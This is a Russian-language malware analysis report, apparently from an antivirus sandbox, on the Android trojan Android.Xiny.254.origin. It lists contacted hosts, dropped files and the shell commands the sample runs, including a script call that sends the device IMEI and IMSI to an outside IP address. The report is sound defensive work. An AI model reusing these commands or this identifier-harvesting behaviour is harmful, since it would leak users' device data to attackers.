Техническая информация
Вредоносные функции:
Выполняет код следующих детектируемых угроз:
- Android.Xiny.254.origin
Сетевая активность:
Подключается к:
- UDP(DNS) <Google DNS>
- TCP(HTTP/1.1) a####.u####.com:80
- TCP(HTTP/1.1) c####.im.qq.com:80
- TCP(HTTP/1.1) br####.dload####.cn:80
- TCP(HTTP/1.1) a####.shar####.cn:5566
- TCP(TLS/1.0) 1####.217.20.110:443
Запросы DNS:
- a####.shar####.cn
- a####.u####.com
- br####.dload####.cn
- c####.im.qq.com
Запросы HTTP GET:
- a####.shar####.cn:5566/date
Запросы HTTP POST:
- a####.u####.com/app_logs
- br####.dload####.cn/pservers/loadgis
- c####.im.qq.com/cgi-bin/cgi_svrtime
Изменения в файловой системе:
Создает следующие файлы:
- /data/data/####/.jg.ic
- /data/data/####/SlideShow_Data.xml
- /data/data/####/libjiagu-1421588239.so
- /data/data/####/mobclick_agent_cached_com.magicphoto.lucm
- /data/data/####/mobclick_agent_header_com.magicphoto.lucm.xml
- /data/data/####/mobclick_agent_state_com.magicphoto.lucm.xml
- /data/data/####/plugin-deploy.jar
- /data/data/####/plugin-deploy.key
- /data/data/####/share_sdk_0.xml
- /data/data/####/sharesdk.db-journal
- /data/data/####/small.ogg
- /data/data/####/unobs
Другие:
Запускает следующие shell-скрипты:
- <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>905dfdda33c8kkapp&version=3.3&imsi=<IMSI>&channel=android&model=<System Property>&free_mem=804929536&total_mem=1055907840&language=en_US 0
- chmod 775 <Package Folder>/app_lib/unobs
- sh <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>905dfdda33c8kkapp&version=3.3&imsi=<IMSI>&channel=android&model=<System Property>&free_mem=804929536&total_mem=1055907840&language=en_US 0
Загружает динамические библиотеки:
- libjiagu-1421588239
Использует следующие алгоритмы для шифрования данных:
- AES
- AES-ECB-PKCS7Padding
Использует следующие алгоритмы для расшифровки данных:
- RSA-ECB-PKCS1Padding
Использует специальную библиотеку для скрытия исполняемого байт-кода.
Получает информацию о сети.
Получает информацию о телефоне (номер, IMEI и т. д.).
Получает информацию о запущенных приложениях.
Отрисовывает собственные окна поверх других приложений.
